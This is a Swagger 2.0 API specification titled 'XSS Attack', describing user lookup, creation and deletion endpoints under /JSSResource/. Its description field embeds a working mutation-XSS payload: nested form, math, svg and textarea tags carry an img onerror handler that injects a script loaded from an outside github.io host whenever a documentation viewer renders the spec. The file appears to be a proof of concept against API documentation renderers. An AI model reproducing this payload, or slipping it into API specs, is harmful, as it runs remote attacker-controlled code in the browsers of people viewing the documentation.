swagger: '2.0'
info:
  title: XSS Attack
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror='x=document.createElement(\'script\');x.src=\'https://mahdizolqadr.github.io/telewall/toast.js\';document.body.appendChild(x)' src=1>"></form>

  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /M0X0101:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - M0X0101_XSS_D
      operationId: findAccounts
      summary: Finds all accounts  
  /users:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - users
      operationId: findUsers
      summary: Finds all users
  '/users/email/{email}':
    get:
      parameters:
        - description: Email address to filter by
          in: path
          name: email
          required: true
          type: string
      responses:
        '200':
          description: No response was specified
      tags:
        - users
      description: 'Because email addresses may not be unique, this operation returns a list of users.  You cannot PUT, POST, and DELETE using this resource URL.'
      operationId: findUsersByEmailAddress
      summary: Finds users by email address
  '/users/id/{id}':
    delete:
      parameters:
        - description: Id value to filter by
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
      tags:
        - users
      operationId: deleteUserById
      summary: Deletes a user by id
    get:
      parameters:
        - description: Id value to filter by
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
      tags:
        - users
      operationId: findUsersById
      summary: Finds users by id
    post:
      parameters:
        - description: Id value to filter by
          in: path
          name: id
          required: true
          type: string
      responses:
        '200':
          description: No response was specified
      tags:
        - users
      description: 'POST cannot be used to add computers, mobile devices, peripherals, vpp assignments to a user.'
      operationId: createUserById
      summary: Creates a new user by id
    put:
      parameters:
        - description: Id value to filter by
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
      tags:
        - users
      description: 'PUT cannot be used to add computers, mobile devices, peripherals, vpp assignments to a user.'
      operationId: updateUserById
      summary: Updates an existing user by id  
